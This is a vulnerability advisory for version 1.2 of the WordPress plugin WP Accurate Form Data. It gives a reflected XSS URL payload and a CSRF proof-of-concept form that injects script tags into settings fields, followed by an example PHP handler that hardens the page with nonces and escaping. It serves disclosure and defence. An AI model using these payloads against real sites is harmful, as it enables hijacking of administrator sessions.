WordPress WP Accurate Form Data 1.2 XSS / CSRF


WordPress WP Accurate Form Data plugin version 1.2 suffers from cross-site request forgery and cross-site scripting vulnerabilities.

Title: WordPress 'WP Accurate Form Data' Plugin 
Version: 1.2
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-21
Download: 
- https://wordpress.org/plugins/accurate-form-data-real-time-form-validation/
- https://plugins.svn.wordpress.org/accurate-form-data-real-time-form-validation/
Notified WordPress: 2015-06-21
==========================================================

## Plugin description
==========================================================
The plugin automatically performs e-mail and physical address validation for most WordPress contact forms.

## XSS Vulnerabilities
==========================================================
The request URI is echoed into the HTML page without sanitization. This can be exploited with a malicious URL (keep in mind that most modern browsers encode the URL).

http://[URL]/wp-admin/options-general.php?page=Accu_Data_WP&a="><script>alert(1)</script>

----

The options on the admin settings page are stored and displayed without sanitization. This can be exploited with a crafted POST request.

PoC (using CSRF):

Log in as admin and submit the following form:

<form method="POST" action="http://[URL]/wp-admin/options-general.php?page=Accu_Data_WP"> 
   <input type="text" name="wClientKey" value=""><script>alert(1)</script>"><br />
   <text>wCheckEmailValidity: </text>
   <input type="text" name="wCheckEmailValidity" value=""><br />
   <input type="text" name="wIncludeOpen" value=""><br />
   <input type="text" name="wEmailBlockAttempts" value=""><script>alert(4)</script>"><br />
   <input type="text" name="wEmailFields" value=""><script>alert(5)</script>"><br />
   <input type="text" name="wCheckPhysicalAddressValidity" value=""><br />
   <input type="text" name="wPhysicalAddressBlockAttempts" value=""><script>alert(7)</script>"><br />
   <input type="text" name="wCityFields" value=""><script>alert(8)</script>"><br />
   <input type="text" name="wZipFields" value=""><script>alert(9)</script>"><br />
   <input type="text" name="wAddressFields" value=""><script>alert(10)</script>"><br />
   <input type="text" name="wStateFields" value=""><script>alert(11)</script>"><br />
   <input type="text" name="wCountryFields" value=""><script>alert(12)</script>"><br />
   <text>wSub </text>
  <input type="text" name="wSub" value="Save Changes" readonly><br />
  <input type="submit">
</form>


## Solution
==========================================================
No fix available
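
As an added example (not the plugin's code and not from the advisory authors), this is how a settings page handling the fields from the PoC form could close all three issues with standard WordPress APIs. The function name `afd_render_settings_page`, the nonce names, and storing each field under an option of the same name are assumptions; the code assumes it is loaded inside WordPress admin.

```php
<?php
// Added example: hardened settings handler. Field names come from the PoC form;
// function name, nonce action/field and option keys are hypothetical.
function afd_render_settings_page() {
    $fields = array(
        'wClientKey', 'wCheckEmailValidity', 'wIncludeOpen', 'wEmailBlockAttempts',
        'wEmailFields', 'wCheckPhysicalAddressValidity', 'wPhysicalAddressBlockAttempts',
        'wCityFields', 'wZipFields', 'wAddressFields', 'wStateFields', 'wCountryFields',
    );

    // Only administrators may view or change these settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }

    if ( isset( $_POST['wSub'] ) ) {
        // CSRF: a cross-site POST cannot carry a valid nonce, so it is rejected here.
        check_admin_referer( 'afd_save_settings', 'afd_nonce' );

        foreach ( $fields as $name ) {
            $raw = isset( $_POST[ $name ] ) ? wp_unslash( $_POST[ $name ] ) : '';
            // Stored XSS, input side: strip tags and control characters before saving.
            update_option( $name, sanitize_text_field( $raw ) );
        }
    }

    // Reflected XSS: build the form action from fixed values instead of
    // echoing the request URI, and escape it for a URL context.
    $action = admin_url( 'options-general.php?page=Accu_Data_WP' );
    echo '<form method="post" action="' . esc_url( $action ) . '">';
    wp_nonce_field( 'afd_save_settings', 'afd_nonce' );

    foreach ( $fields as $name ) {
        // Stored XSS, output side: escape every value for the attribute context,
        // so data saved before the fix cannot break out of value="...".
        printf(
            '<label>%1$s <input type="text" name="%2$s" value="%3$s"></label><br />',
            esc_html( $name ),
            esc_attr( $name ),
            esc_attr( get_option( $name, '' ) )
        );
    }

    echo '<input type="submit" name="wSub" value="Save Changes">';
    echo '</form>';
}
```

Escaping on output matters even with sanitization on input, because option values written before the handler was fixed are still rendered by the page.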

==========================================================
XSS vulnerabilities found using Eir, an early-stage static vulnerability scanner for PHP applications.

Source: Packet Storm Security